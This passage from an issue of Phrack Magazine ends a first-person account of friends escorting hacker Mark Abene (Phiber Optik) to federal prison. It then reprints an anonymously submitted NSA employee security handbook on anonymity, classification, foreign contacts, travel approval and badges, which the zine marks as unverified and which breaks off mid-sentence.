  6812.  managed to quit but all of the stress of the past year has gotten
  6813.  him right back into it), and since he had never heard of the wide
  6814.  version, I figured he'd like to compare the two, so I bought him a
  6815.  pack. I never buy cigarettes for anyone because I can't stand them
  6816.  and I think they're death sticks but in this case I knew they'd be
  6817.  therapeutic. As we stood out there in the single digits - him with
  6818.  his Wides, me with my iced tea - he said he could definitely feel
  6819.  more smoke per inch. And, for some reason, I was glad to hear it.
  6820.  
  6821.  Minersville was our final destination but we had one more town to
  6822.  pass through - Frackville. Yeah, no shit. It was the final dose of
  6823.  that magical karma we needed. As we looked down the streets of this
  6824.  tiny town, we tried to find a sign that maybe we could take a
  6825.  picture of, since nobody would ever believe us. We pulled up to a
  6826.  convenience store as two cops were going in. And that's when we
  6827.  realized what we had been sent there to do.
  6828.  
  6829.  Bernie S. went in to talk to the cops and when he came out, he had
  6830.  convinced them to pose with Mark in front of their squad car. (It
  6831.  didn't really take much convincing - they were amazed that anyone
  6832.  would care.) So, if the pictures come out, you can expect to see a
  6833.  shot of Phiber Optik being "arrested" by the Frackville police, all
  6834.  with big smiles on their faces. Frackville, incidentally, has a
  6835.  population of about 5,000 which I'm told is about the distribution
  6836.  of Phrack Magazine. Kinda cosmic.
  6837.  
  6838.  So now there was nothing left to do. We couldn't even get lost -
  6839.  the prison was straight ahead of us. Our long journey was about to
  6840.  come to a close. But it had been incredible from the start; there
  6841.  was no reason to believe the magic would end here. The prison
  6842.  people would be friendly, maybe we'd chat with them for a while.
  6843.  They'd make hot chocolate. All right, maybe not. But everybody
  6844.  would part on good terms. We'd all give Mark a hug. Our sadness
  6845.  would be countered by hope.
  6846.  
  6847.  The compound was huge and brightly lit. We drove through it for
  6848.  miles before reaching the administration building. We assumed this
  6849.  was where Mark should check in so we parked the cars there and took
  6850.  a couple of final videos from our camcorder. Mark was nervous but
  6851.  he was still Mark. "I think the message is 'come here in the
  6852.  summer,'" he said to the camera as we shivered uncontrollably in
  6853.  the biting freeze.
  6854.  
  6855.  As we got to the door of the administration building, we found it
  6856.  to be locked. We started looking for side doors or any other way to
  6857.  get in. "There's not a record of people breaking *into* prison,"
  6858.  Bernie wondered out loud. It was still more craziness. Could they
  6859.  actually be closed?
  6860.  
  6861.  I drove down the road to another building and a dead end. Bernie
  6862.  called the prison from his cellular phone. He told them he was in
  6863.  front of the administration building and he wanted to check
  6864.  somebody in. They were very confused and said there was no way he
  6865.  could be there. He insisted he was and told them he was in his car.
  6866.  "You have a *car* phone?" they asked in amazement. When the dust
  6867.  settled, they said to come down to the building at the end of the
  6868.  road where I was already parked. We waited around for a couple of
  6869.  minutes until we saw some movement inside. Then we all got out and
  6870.  started the final steps of our trip.
  6871.  
  6872.  I was the first one to get to the door. A middle-aged bespectacled
  6873.  guy was there. I said hi to him but he said nothing and fixed his
  6874.  gaze on the five other people behind me.
  6875.  
  6876.  "All right, who's from the immediate family?"
  6877.  
  6878.  "None of us are immediate family. We're just--"
  6879.  
  6880.  "Who's the individual reporting in?"
  6881.  
  6882.  "I'm the individual reporting in," Mark said quietly.
  6883.  
  6884.  "The only one I need is just him."
  6885.  
  6886.  The guard asked Mark if he had anything on him worth more than
  6887.  $100. Mark said he didn't. The guard turned to us.
  6888.  
  6889.  "All right, gentlemen. He's ours. Y'all can depart."
  6890.  
  6891.  They pulled him inside and he was gone. No time for goodbyes from
  6892.  any of us - it happened that fast. It wasn't supposed to have been
  6893.  like this; there was so much to convey in those final moments.
  6894.  Mark, we're with you... Hang in there... We'll come and visit....
  6895.  Just a fucking goodbye for God's sake.
  6896.  
  6897.  It caught us all totally off guard. They were treating him like a
  6898.  maximum security inmate. And they treated us like we were nothing,
  6899.  like we hadn't been through this whole thing together, like we
  6900.  hadn't just embarked on this crazy adventure for the last few days.
  6901.  The karma was gone.
  6902.  
  6903.  From behind the door, a hooded figure appeared holding handcuffs.
  6904.  He looked through the glass at us as we were turning to leave.
  6905.  Suddenly, he opened the outer door and pointed to our camera. "You
  6906.  can't be videotaping the prison here," he said. "All right," I
  6907.  replied, being the closest one to him and the last to start back to
  6908.  the cars. As I turned away, he came forward and said, "We gotta
  6909.  have that film." "But we didn't take any pictures of the prison!"
  6910.  I objected. "We gotta take it anyway," he insisted.
  6911.  
  6912.  We all knew what to do. Giving up the tape would mean losing all
  6913.  recordings of Mark's last days of freedom. The meeting in
  6914.  Philadelphia, slipping down the icy streets, hanging out in
  6915.  Bernie's house, Frackville.... No way. No fucking way.
  6916.  
  6917.  Roman, who had been our cameraman throughout, carefully passed off
  6918.  the camera to Bernie, who quickly got to the front of the group. I
  6919.  stayed behind to continue insisting that we hadn't filmed any part
  6920.  of their precious prison. I didn't even get into the fact that
  6921.  there are no signs up anywhere saying this and that it appeared to
  6922.  me that he was imposing this rule just to be a prick. Not that I
  6923.  would have, since Mark was somewhere inside that building and
  6924.  anything we did could have repercussions for him. Fortunately, the
  6925.  hooded guard appeared to conclude that even if he was able to grab
  6926.  our camera, he'd probably never find the tape. And he never would
  6927.  have.
  6928.  
  6929.  The hooded guard stepped back inside and we went on our way. If it
  6930.  had been dark and cold before, now it was especially so. And we all
  6931.  felt the emptiness that had replaced Mark, who had been an active
  6932.  part of our conversations only a couple of minutes earlier. We
  6933.  fully expected to be stopped or chased at any moment for the
  6934.  "trouble" we had caused. It was a long ride out of the compound.
  6935.  
  6936.  We headed for the nearest major town:  Pottsville. There, we went to
  6937.  the only 24 hour anything in miles, a breakfast/burger joint called
  6938.  Coney Island of all things. We just kind of sat there for awhile,
  6939.  not really knowing what to say and feeling like real solid shit.
  6940.  Roman took out the camcorder and started looking through the view
  6941.  screen. "We got it," he said. "We got it all."
  6942.  
  6943.  Looking at the tape, the things that really hit me hard are the
  6944.  happy things. Seeing the cops of Frackville posing and laughing
  6945.  with Mark, only a few minutes before that ugly episode, puts a
  6946.  feeling of lead in my stomach. I'm just glad we gave him a hell of
  6947.  a sendoff; memories of it will give him strength to get through
  6948.  this.
  6949.  
  6950.  What sticks with me the most is the way Mark never changed, right
  6951.  up to the end. He kept his incredible sense of humor, his caustic
  6952.  wit, his curiosity and sense of adventure. And he never stopped
  6953.  being a hacker in the true sense. What would a year of this
  6954.  environment do to such a person?
  6955.  
  6956.  Our long ride back to New York was pretty quiet for the most part.
  6957.  Occasionally we'd talk about what happened and then we'd be alone
  6958.  with our thoughts. My thoughts are disturbing. I know what I saw
  6959.  was wrong. I know one day we'll realize this was a horrible thing
  6960.  to do to somebody in the prime of life. I don't doubt any of that.
  6961.  What I worry about is what the cost will be. What will happen to
  6962.  these bright, enthusiastic, and courageous people I've come to know
  6963.  and love? How many of us will give up and become embittered shells
  6964.  of the full individuals we started out as? Already, I've caught
  6965.  myself muttering aloud several times, something new for me.
  6966.  
  6967.  Mark was not the only one, not by far. But he was a symbol - even
  6968.  the judge told him that at the sentencing. And a message was sent,
  6969.  as our system of justice is so fond of doing. But this time another
  6970.  message was sent - this one from Mark, his friends, and the scores
  6971.  of other hackers who spoke up. Everybody knew this wasn't right.
  6972.  All through this emotional sinkhole, our tears come from sadness
  6973.  and from anger. And, to quote the Clash, "Anger can be power." Now
  6974.  we just have to learn to use it.
  6975.  
  6976.         Mark Abene #32109-054
  6977.         FPC, Schuylkill
  6978.         Unit 1
  6979.         PO Box 670
  6980.         Minersville, PA 17954-0670
  6981.  
  6982. [Letters, paperback books, and photos are acceptable. Virtually
  6983.  nothing else is. And remember that everything will be looked at
  6984.  by prison people first.]
  6985.                               ==Phrack Magazine==
  6986.  
  6987.                  Volume Five, Issue Forty-Five, File 10 of 28
  6988.  
  6989. ****************************************************************************
  6990.  
  6991. [NOTE:  This file was retyped from an anonymous photocopied submission.  The
  6992.         authenticity of it was not verified.]
  6993.  
  6994.  
  6995. Security Guidelines
  6996.  
  6997. This handbook is designed to introduce you to some of the basic
  6998. security principles and procedures with which all NSA employees must comply.
  6999. It highlights some of your security responsibilities, and provides guidelines
  7000. for answering questions you may be asked concerning your association with this
  7001. Agency.  Although you will be busy during the forthcoming weeks learning your
  7002. job, meeting co-workers, and becoming accustomed to a new work environment, you
  7003. are urged to become familiar with the security information contained in this
  7004. handbook.  Please note that a listing of telephone numbers is provided at the
  7005. end of this handbook should you have any questions or concerns.
  7006.  
  7007. Introduction
  7008.  
  7009. In joining NSA you have been given an opportunity to participate in the
  7010. activities of one of the most important intelligence organizations of the United
  7011. States Government.  At the same time, you have also assumed a trust which
  7012. carries with it a most important individual responsibility--the safeguarding of
  7013. sensitive information vital to the security of our nation.
  7014.  
  7015. While it is impossible to estimate in actual dollars and cents the value of the
  7016. work being conducted by this Agency, the information to which you will have
  7017. access at NSA is without question critically important to the defense of the
  7018. United States.  Since this information may be useful only if it is kept secret,
  7019. it requires a very special measure of protection.  The specific nature of this
  7020. protection is set forth in various Agency security regulations and directives.
  7021. The total NSA Security Program, however, extends beyond these regulations.  It
  7022. is based upon the concept that security begins as a state of mind.  The program
  7023. is designed to develop an appreciation of the need to protect information vital
  7024. to the national defense, and to foster the development of a level of awareness
  7025. which will make security more than routine compliance with regulations.
  7026.  
  7027. At times, security practices and procedures cause personal inconvenience.  They
  7028. take time and effort and on occasion may make it necessary for you to
  7029. voluntarily forego some of your usual personal perogatives.  But your
  7030. compensation for the inconvenience is the knowledge that the work you are
  7031. accomplishing at NSA, within a framework of sound security practices,
  7032. contributes significantly to the defense and continued security of the United
  7033. States of America.
  7034.  
  7035. I extend to you my very best wishes as you enter upon your chosen career or
  7036. assignment with NSA.
  7037.  
  7038. Philip T. Pease
  7039. Director of Security
  7040.  
  7041.  
  7042. INITIAL SECURITY RESPONSIBILITIES
  7043.  
  7044. Anonymity
  7045.  
  7046. Perhaps one of the first security practices with which new NSA personnel should
  7047. become acquainted is the practice of anonymity.  In an open society such as ours,
  7048. this practice is necessary because information which is generally available to
  7049. the public is available also to hostile intelligence.  Therefore, the Agency
  7050. mission is best accomplished apart from public attention.  Basically, anonymity
  7051. means that NSA personnel are encouraged not to draw attention to themselves nor
  7052. to their association with this Agency.  NSA personnel are also cautioned neither
  7053. to confirm nor deny any specific questions about NSA activities directed to them
  7054. by individuals not affiliated with the Agency.
  7055.  
  7056. The ramifications of the practice of anonymity are rather far reaching, and its
  7057. success depends on the cooperation of all Agency personnel.  Described below you
  7058. will find some examples of situations that you may encounter concerning your
  7059. employment and how you should cope with them.  Beyond the situations cited, your
  7060. judgement and discretion will become the deciding factors in how you respond to
  7061. questions about your employment.
  7062.  
  7063. Answering Questions About Your Employment
  7064.  
  7065. Certainly, you may tell your family and friends that you are employed at or
  7066. assigned to the National Security Agency.  There is no valid reason to deny them
  7067. this information.  However, you may not disclose to them any information
  7068. concerning specific aspects of the Agency's mission, activities, and
  7069. organization.  You should also ask them not to publicize your association with
  7070. NSA.
  7071.  
  7072. Should strangers or casual acquaintances question you about your place of
  7073. employment, an appropriate reply would be that you work for the Department of
  7074. Defense.  If questioned further as to where you are employed within the
  7075. Department of Defense, you may reply, "NSA."  When you inform someone that you
  7076. work for NSA (or the Department of Defense) you may expect that the next
  7077. question will be, "What do you do?"  It is a good idea to anticipate this
  7078. question and to formulate an appropriate answer.  Do not act mysteriously about
  7079. your employment, as that would only succeed in drawing more attention to
  7080. yourself.
  7081.  
  7082. If you are employed as a secretary, engineer, computer scientist, or in a
  7083. clerical, administrative, technical, or other capacity identifiable by a general
  7084. title which in no way indicates how your talents are being applied to the
  7085. mission of the Agency, it is suggested that you state this general title.  If
  7086. you are employed as a linguist, you may say that you are a linguist, if
  7087. necessary.  However, you should not indicate the specific language(s) with which
  7088. you are involved.
  7089.  
  7090. The use of service specialty titles which tend to suggest or reveal the nature of
  7091. the Agency's mission  or specific aspects of their work.  These professional
  7092. titles, such as cryptanalyst, signals collection officer, and intelligence
  7093. research analyst, if given verbatim to an outsider, would likely generate
  7094. further questions which may touch upon the classified aspects of your work.
  7095. Therefore, in conversation with outsiders, it is suggested that such job titles
  7096. be generalized.  For example, you might indicate that you are a "research
  7097. analyst."  You may not, however, discuss the specific nature of your analytic
  7098. work.
  7099.  
  7100. Answering Questions About Your Agency Training
  7101.  
  7102. During your career or assignment at NSA, there is a good chance that you will
  7103. receive some type of job-related training.  In many instances the nature of the
  7104. training is not classified.  However, in some situations the specialized
  7105. training you receive will relate directly to sensitive Agency functions.  In
  7106. such cases, the nature of this training may not be discussed with persons
  7107. outside of this Agency.
  7108.  
  7109. If your training at the Agency includes language training, your explanation for
  7110. the source of your linguistic knowledge should be that you obtained it while
  7111. working for the Department of Defense.
  7112.  
  7113. You Should not draw undue attention to your language abilities, and you may not
  7114. discuss how you apply your language skill at the Agency.
  7115.  
  7116. If you are considering part-time employment which requires the use of language
  7117. or technical skills similar to those required for the performance of your NSA
  7118. assigned duties, you must report (in advance) the anticipated part-time work
  7119. through your Staff Security Officer (SSO) to the Office of Security's Clearance
  7120. Division (M55).
  7121.  
  7122. Verifying Your Employment
  7123.  
  7124. On occasion, personnel must provide information concerning their employment to
  7125. credit institutions in connection with various types of applications for credit.
  7126. In such situations you may state, if you are a civilian employee, that you are
  7127. employed by NSA and indicate your pay grade or salary.  Once again, generalize
  7128. your job title.  If any further information is desired by persons or firms with
  7129. whom you may be dealing, instruct them to request such information by
  7130. correspondence addressed to:  Director of Civilian Personnel, National Security
  7131. Agency, Fort George G. Meade, Maryland 20755-6000.  Military personnel should
  7132. use their support group designator and address when indicating their current
  7133. assignment.
  7134.  
  7135. If you contemplate leaving NSA for employment elsewhere, you may be required to
  7136. submit a resume/job application, or to participate in extensive employment
  7137. interviews.  In such circumstances, you should have your resume reviewed by the
  7138. Classification Advisory Officer (CAO) assigned to your organization.  Your CAO
  7139. will ensure that any classified operational details of your duties have been
  7140. excluded and will provide you with an unclassified job description.  Should you
  7141. leave the Agency before preparing such a resume, you may develop one and send it
  7142. by registered mail to the NSA/CSS Information Policy Division (Q43) for review.
  7143. Remember, your obligation to protect sensitive Agency information extends
  7144. beyond your employment at NSA.
  7145.  
  7146. The Agency And Public News Media
  7147.  
  7148. From time to time you may find that the agency is the topic of reports or
  7149. articles appearing in public news media--newspapers, magazines, books, radio
  7150. and TV.  The NSA/CSS Information Policy Division (Q43) represents the Agency in
  7151. matters involving the press and other media.  This office serves at the
  7152. Agency's official media center and is the Director's liaison office for public
  7153. relations, both in the community and with other government agencies.  The
  7154. Information Policy Division must approve the release of all information for and
  7155. about NSA, its mission, activities, and personnel.  In order to protect the
  7156. aspects of Agency operations, NSA personnel must refrain from either confirming
  7157. or denying any information concerning the Agency or its activities which may
  7158. appear in the public media.  If you are asked about the activities of NSA, the
  7159. best response is "no comment."  You should the notify Q43 of the attempted
  7160. inquiry.  For the most part, public references to NSA are based upon educated
  7161. guesses.  The Agency does not normally make a practice of issuing public
  7162. statements about its activities.
  7163.  
  7164. GENERAL RESPONSIBILITIES
  7165.  
  7166. Espionage And Terrorism
  7167.  
  7168. During your security indoctrination and throughout your NSA career you will
  7169. become increasingly aware of the espionage and terrorist threat to the United
  7170. States.  Your vigilance is the best single defense in protecting NSA
  7171. information, operations, facilities and people.  Any information that comes to
  7172. your attention that suggests to you the existence of, or potential for,
  7173. espionage or terrorism against the U.S. or its allies must be promptly reported
  7174. by you to the Office of Security.
  7175.  
  7176. There should be no doubt in your mind about the reality of the threats.  You
  7177. are now affiliated with the most sensitive agency in government and are
  7178. expected to exercise vigilance and common sense to protect NSA against these
  7179. threats.
  7180.  
  7181. Classification
  7182.  
  7183. Originators of correspondence, communications, equipment, or documents within
  7184. the Agency are responsible for ensuring that the proper classification,
  7185. downgrading information and, when appropriate, proper caveat notations are
  7186. assigned to such material.  (This includes any handwritten notes which contain
  7187. classified information).  The three levels of classification are Confidential,
  7188. Secret and Top Secret.  The NSA Classification Manual should be used as
  7189. guidance in determining proper classification.  If after review of this document
  7190. you need assistance, contact the Classification Advisory Officer (CAO) assigned
  7191. to your organization, or the Information Policy Division (Q43).
  7192.  
  7193. Need-To-Know
  7194.  
  7195. Classified information is disseminated only on a strict "need-to-know" basis.
  7196. The "need-to-know" policy means that classified information will be
  7197. disseminated only to those individuals who, in addition to possessing a proper
  7198. clearance, have a requirement to know this information in order to perform
  7199. their official duties (need-to-know).  No person is entitled to classified
  7200. information solely by virtue of office, position, rank, or security clearance.
  7201.  
  7202. All NSA personnel have the responsibility to assert the "need-to-know" policy
  7203. as part of their responsibility to protect sensitive information.
  7204. Determination of "need-to-know" is a supervisory responsibility.  This means
  7205. that if there is any doubt in your mind as to an individual's "need-to-know,"
  7206. you should always check with your supervisor before releasing any classified
  7207. material under your control.
  7208.  
  7209. For Official Use Only
  7210.  
  7211. Separate from classified information is information or material marked "FOR
  7212. OFFICIAL USE ONLY" (such as this handbook).  This designation is used to
  7213. identify that official information or material which, although unclassified, is
  7214. exempt from the requirement for public disclosure of information concerning
  7215. government activities and which, for a significant reason, should not be given
  7216. general circulation.  Each holder of "FOR OFFICAL USE ONLY" (FOUO) information
  7217. or material is authorized to disclose such information or material to persons
  7218. in other departments or agencies of the Executive and Judicial branches when it
  7219. is determined that the information or material is required to carry our a
  7220. government function.  The recipient must be advised that the information or
  7221. material is not to be disclosed to the general public.  Material which bears
  7222. the "FOR OFFICIAL USE ONLY" caveat does not come under the regulations
  7223. governing the protection of classified information.  The unauthorized
  7224. disclosure of information marked "FOR OFFICIAL USE ONLY" does not constitute an
  7225. unauthorized disclosure of classified defense information.  However, Department
  7226. of Defense and NSA regulations prohibit the unauthorized disclosure of
  7227. information designated "FOR OFFICIAL USE ONLY."  Appropriate administrative
  7228. action will be taken to determine responsibility and to apply corrective and/or
  7229. disciplinary measures in cases of unauthorized disclosure of information which
  7230. bears the "FOR OFFICIAL USE ONLY" caveat.  Reasonable care must be exercised in
  7231. limiting the dissemination of "FOR OFFICIAL USE ONLY" information.  While you
  7232. may take this handbook home for further study, remember that is does contain
  7233. "FOR OFFICIAL USE ONLY" information which should be protected.
  7234.  
  7235. Prepublication Review
  7236.  
  7237. All NSA personnel (employees, military assignees, and contractors) must submit
  7238. for review any planned articles, books, speeches, resumes, or public statements
  7239. that may contain classified, classifiable, NSA-derived, or unclassified
  7240. protected information, e.g., information relating to the organization, mission,
  7241. functions, or activities of NSA.  Your obligation to protect this sensitive
  7242. information is a lifetime one.  Even when you resign, retire, or otherwise end
  7243. your affiliation with NSA, you must submit this type of material for
  7244. prepublication review.  For additional details, contact the Information Policy
  7245. Division (Q43) for an explanation of prepublication review procedures.
  7246.  
  7247. Personnel Security Responsibilities
  7248.  
  7249. Perhaps you an recall your initial impression upon entering an NSA facility.
  7250. Like most people, you probably noticed the elaborate physical security
  7251. safeguards--fences, concrete barriers, Security Protective Officers,
  7252. identification badges, etc.  While these measures provide a substantial degree
  7253. of protection for the information housed within our buildings, they represent
  7254. only a portion of the overall Agency security program.  In fact, vast amounts
  7255. of information leave our facilities daily in the minds of NSA personnel, and
  7256. this is where our greatest vulnerability lies.  Experience has indicated that
  7257. because of the vital information we work with at NSA, Agency personnel may
  7258. become potential targets for hostile intelligence efforts.  Special safeguards
  7259. are therefore necessary to protect our personnel.
  7260.  
  7261. Accordingly, the Agency has an extensive personnel security program which
  7262. establishes internal policies and guidelines governing employee conduct and
  7263. activities.  These policies cover a variety of topics, all of which are
  7264. designed to protect both you and the sensitive information you will gain
  7265. through your work at NSA.
  7266.  
  7267. Association With Foreign Nationals
  7268.  
  7269. As a member of the U.S. Intelligence Community and by virtue of your access to
  7270. sensitive information, you are a potential target for hostile intelligence
  7271. activities carried out by or on behalf of citizens of foreign
  7272. countries.  A policy concerning association with foreign nationals has been
  7273. established by the Agency to minimize the likelihood that its personnel might
  7274. become subject to undue influence or duress or targets of hostile activities
  7275. through foreign relationships.
  7276.  
  7277. As an NSA affiliate, you are prohibited from initiating or maintaining
  7278. associations (regardless of the nature and degree) with citizens or officials
  7279. of communist-controlled, or other countries which pose a significant threat to
  7280. the security of the United States and its interests.  A comprehensive list of
  7281. these designated countries is available from your Staff Security Officer or the
  7282. Security Awareness Division.  Any contact with citizens of these countries, no
  7283. matter how brief or seemingly innocuous, must be reported as soon as possible
  7284. to your Staff Security Officer (SSO).  (Individuals designated as Staff
  7285. Security Officers are assigned to every organization; a listing of Staff
  7286. Security Officers can be found at the back of this handbook).
  7287.  
  7288. Additionally, close and continuing associations with any non-U.S. citizens which
  7289. are characterized by ties of kinship, obligation, or affection are prohibited.
  7290. A waiver to this policy may be granted only under the most exceptional
  7291. circumstances when there is a truly compelling need for an individual's
  7292. services or skills and the security risk is negligible.
  7293.  
  7294. In particular, a waiver must be granted in advance of a marriage to or
  7295. cohabitation with a foreign national in order to retain one's access to NSA
  7296. information.  Accordingly, any intent to cohabitate with or marry a non-U.S.
  7297. citizen must be reported immediately to your Staff Security Officer.  If a
  7298. waiver is granted, future reassignments both at headquarters and overseas may
  7299. be affected.
  7300.  
  7301. The marriage or intended marriage of an immediate family member (parents,
  7302. siblings, children) to a foreign national must also be reported through your
  7303. SSO to the Clearance Division (M55).
  7304.  
  7305. Casual social associations with foreign nationals (other than those of the
  7306. designated countries mentioned above) which arise from normal living and
  7307. working arrangements in the community usually do not have to be reported.
  7308. During the course of these casual social associations, you are encouraged to
  7309. extend the usual social amenities.  Do not act mysteriously or draw attention
  7310. to yourself (and possibly to NSA) by displaying an unusually wary attitude.
  7311.  
  7312. Naturally, your affiliation with the Agency and the nature of your work should
  7313. not be discussed.  Again, you should be careful not to allow these associations
  7314. to become close and continuing to the extent that they are characterized by
  7315. ties of kinship, obligation, or affection.
  7316.  
  7317. If at any time you feel that a "casual" association is in any way suspicious,
  7318. you should report this to your Staff Security Officer immediately.  Whenever
  7319. any doubt exists as to whether or not a situation should be reported or made a
  7320. matter of record, you should decided in favor of reporting it.  In this way,
  7321. the situation can be evaluated on its own merits, and you can be advised as to
  7322. your future course of action.
  7323.  
  7324. Correspondence With Foreign Nationals
  7325.  
  7326. NSA personnel are discouraged from initiating correspondence with individuals
  7327. who are citizens of foreign countries.  Correspondence with citizens of
  7328. communist-controlled or other designated countries is prohibited.  Casual
  7329. social correspondence, including the "penpal" variety, with other foreign
  7330. acquaintances is acceptable and need not be reported.  If, however, this
  7331. correspondence should escalate in its frequency or nature, you should report
  7332. that through your Staff Security Officer to the Clearance Division (M55).
  7333.  
  7334. Embassy Visits
  7335.  
  7336. Since a significant percentage of all espionage activity is known to be
  7337. conducted through foreign embassies, consulates, etc., Agency policy
  7338. discourages visits to embassies, consulates or other official establishments of
  7339. a foreign government.  Each case, however, must be judged on the circumstances
  7340. involved.  Therefore, if you plan to visit a foreign embassy for any reason
  7341. (even to obtain a visa), you must consult with, and obtain the prior approval
  7342. of, your immediate supervisor and the Security Awareness Division (M56).
  7343.  
  7344. Amateur Radio Activities
  7345.  
  7346. Amateur radio (ham radio) activities are known to be exploited by hostile
  7347. intelligence services to identify individuals with access to classified
  7348. information; therefore, all licensed operators are expected to be familiar
  7349. with NSA/CSS Regulation 100-1, "Operation of Amateur Radio Stations" (23
  7350. October 1986).  The specific limitations on contacts with operators from
  7351. communist and designated countries are of particular importance.  If you are
  7352. an amateur radio operator you should advise the Security Awareness Division
  7353. (M56) of your amateur radio activities so that detailed guidance may be
  7354. furnished to you.
  7355.  
  7356. Unofficial Foreign Travel
  7357.  
  7358. In order to further protect sensitive information from possible compromise
  7359. resulting from terrorism, coercion, interrogation or capture of Agency
  7360. personnel by hostile nations and/or terrorist groups, the Agency has
  7361. established certain policies and procedures concerning unofficial foreign
  7362. travel.
  7363.  
  7364. All Agency personnel (civilian employees, military assignees, and contractors)
  7365. who are planning unofficial foreign travel must have that travel approved by
  7366. submitting a proposed itinerary to the Security Awareness Division (M56) at
  7367. least 30 working days prior to their planned departure from the United States.
  7368. Your itinerary should be submitted on Form K2579 (Unofficial Foreign Travel
  7369. Request).  This form provides space for noting the countries to be visited,
  7370. mode of travel, and dates of departure and return.  Your immediate supervisor
  7371. must sign this form to indicate whether or not your proposed travel poses a
  7372. risk to the sensitive information, activities, or projects of which you may
  7373. have knowledge due to your current assignment.
  7374.  
  7375. After your supervisor's assessment is made, this form should be forwarded to
  7376. the Security Awareness Director (M56).  Your itinerary will then be reviewed in
  7377. light of the existing situation in the country or countries to be visited, and
  7378. a decision for approval or disapproval will be based on this assessment.  The
  7379. purpose of this policy is to limit the risk of travel to areas of the world
  7380. where a threat may exist to you and to your knowledge of classified Agency
  7381. activities.
  7382.  
  7383. In this context, travel to communist-controlled and other hazardous activity
  7384. areas is prohibited.  A listing of these hazardous activity areas is
  7385. prohibited.  A listing of these hazardous activity areas can be found in Annex
  7386. A of NSA/CSS Regulation No. 30-31, "Security Requirements for Foreign Travel"
  7387. (12 June 1987).  From time to time, travel may also be prohibited to certain
  7388. areas where the threat from hostile intelligence services, terrorism, criminal
  7389. activity or insurgency poses an unacceptable risk to Agency employees and to
  7390. the sensitive information they possess.  Advance travel deposits made without
  7391. prior agency approval of the proposed travel may result in financial losses by
  7392. the employee should the travel be disapproved, so it is important to obtain
  7393. approval prior to committing yourself financially.  Questions regarding which
  7394. areas of the world currently pose a threat should be directed to the Security
  7395. Awareness Division (M56).
  7396.  
  7397. Unofficial foreign travel to Canada, the Bahamas, Bermuda, and Mexico does not
  7398. require prior approval, however, this travel must still be reported using Form
  7399. K2579.  Travel to these areas may be reported after the fact.
  7400.  
  7401. While you do not have to report your foreign travel once you have ended your
  7402. affiliation with the Agency, you should be aware that the risk incurred in
  7403. travelling to certain areas, from a personal safety and/or counterintelligence
  7404. standpoint, remains high.  The requirement to protect the classified
  7405. information to which you have had access is a lifetime obligation.
  7406.  
  7407. Membership In Organizations
  7408.  
  7409. Within the United States there are numerous organizations with memberships
  7410. ranging from a few to tens of thousands.  While you may certainly participate
  7411. in the activities of any reputable organization, membership in any international
  7412. club or professional organization/activity with foreign members should be
  7413. reported through your Staff Security Officer to the Clearance Division (M55).
  7414. In most cases there are no security concerns or threats to our employees or
  7415. affiliates.  However, the Office of Security needs the opportunity to research
  7416. the organization and to assess any possible risk to you and the information to
  7417. which you have access.
  7418.  
  7419. In addition to exercising prudence in your choice of organizational
  7420. affiliations, you should endeavor to avoid participation in public activities
  7421. of a conspicuously controversial nature because such activities could focus
  7422. undesirable attention upon you and the Agency.  NSA employees may, however,
  7423. participate in bona fide public affairs such as local politics, so long as such
  7424. activities do not violate the provisions of the statutes and regulations which
  7425. govern the political activities of all federal employees.  Additional
  7426. information may be obtained from your Personnel Representative.
  7427.  
  7428. Changes In Marital Status/Cohabitation/Names
  7429.  
  7430. All personnel, either employed by or assigned to NSA, must advise the Office of
  7431. Security of any changes in their marital status (either marriage or divorce),
  7432. cohabitation arrangements, or legal name changes.  Such changes should be
  7433. reported by completing NSA Form G1982 (Report of Marriage/Marital Status
  7434. Change/Name Change), and following the instructions printed on the form.
  7435.  
  7436. Use And Abuse Of Drugs
  7437.  
  7438. It is the policy of the National Security Agency to prevent and eliminate the
  7439. improper use of drugs by Agency employees and other personnel associated with
  7440. the Agency.  The term "drugs" includes all controlled drugs or substances
  7441. identified and listed in the Controlled Substances Act of 1970, as amended,
  7442. which includes but is not limited to:  narcotics, depressants, stimulants,
  7443. cocaine, hallucinogens ad cannabis (marijuana, hashish, and hashish oil).
  7444. The use of illegal drugs or the abuse of prescription drugs by persons employed
  7445. by, assigned or detailed to the Agency may adversely affect the national
  7446. security; may have a serious damaging effect on the safety and the safety of
  7447. others; and may lead to criminal prosecution.  Such use of drugs either within
  7448. or outside Agency controlled facilities is prohibited.
  7449.  
  7450. Physical Security Policies
  7451.  
  7452. The physical security program at NSA provides protection for classified
  7453. material and operations and ensures that only persons authorized access to the
  7454. Agency's spaces and classified material are permitted such access.  This
  7455. program is concerned not only with the Agency's physical plant and facilities,
  7456. but also with the internal and external procedures for safeguarding the
  7457. Agency's classified material and activities.  Therefore, physical security
  7458. safeguards include Security Protective Officers, fences, concrete barriers,
  7459. access control points, identification badges, safes, and the
  7460. compartmentalization of physical spaces.  While any one of these safeguards
  7461. represents only a delay factor against attempts to gain unauthorized access to
  7462. NSA spaces and material, the total combination of all these safeguards
  7463. represents a formidable barrier against physical penetration of NSA.  Working
  7464. together with personnel security policies, they provide "security in depth."
  7465.  
  7466. The physical security program depends on interlocking procedures.  The
  7467. responsibility for carrying out many of these procedures rests with the
  7468. individual.  This means you, and every person employed by, assign, or detailed
  7469. to the Agency, must assume the responsibility for protecting classified
  7470. material.  Included in your responsibilities are:  challenging visitors in
  7471. operational areas; determining "need-to-know;" limiting classified
  7472. conversations to approved areas; following established locking and checking
  7473. procedures; properly using the secure and non-secure telephone systems;
  7474. correctly wrapping and packaging classified data for transmittal; and placing
  7475. classified waste in burn bags.
  7476.  
  7477. The NSA Badge
  7478.  
  7479. Even before you enter an NSA facility, you have a constant reminder of
  7480. security--the NSA badge.  Every person who enters an NSA installation is
  7481. required to wear an authorized badge.  To enter most NSA facilities your badge
  7482. must be inserted into an Access Control Terminal at a building entrance and you
  7483. must enter your Personal Identification Number (PIN) on the terminal keyboard.
  7484. In the absence of an Access Control Terminal, or when passing an internal
  7485. security checkpoint, the badge should be held up for viewing by a Security
  7486. Protective Officer.  The badge must be displayed at all times while the
  7487. individual remains within any NSA installation.
  7488.  
  7489. NSA Badges must be clipped to a beaded neck chain.  If necessary for the safety
  7490. of those working in the area of electrical equipment or machinery, rubber
  7491. tubing may be used to insulate the badge chain.  For those Agency personnel
  7492. working in proximity to other machinery or equipment, the clip may be used to
  7493. attach the badge to the wearer's clothing, but it must also remain attached to
  7494. the chain.
  7495.  
  7496. After you leave an NSA installation, remove your badge from public view, thus
  7497. avoiding publicizing your NSA affiliation.  Your badge should be kept in a safe
  7498. place which is convenient enough to ensure that you will be reminded to bring it
  7499. with you to work.  A good rule of thumb is to afford your badge the same
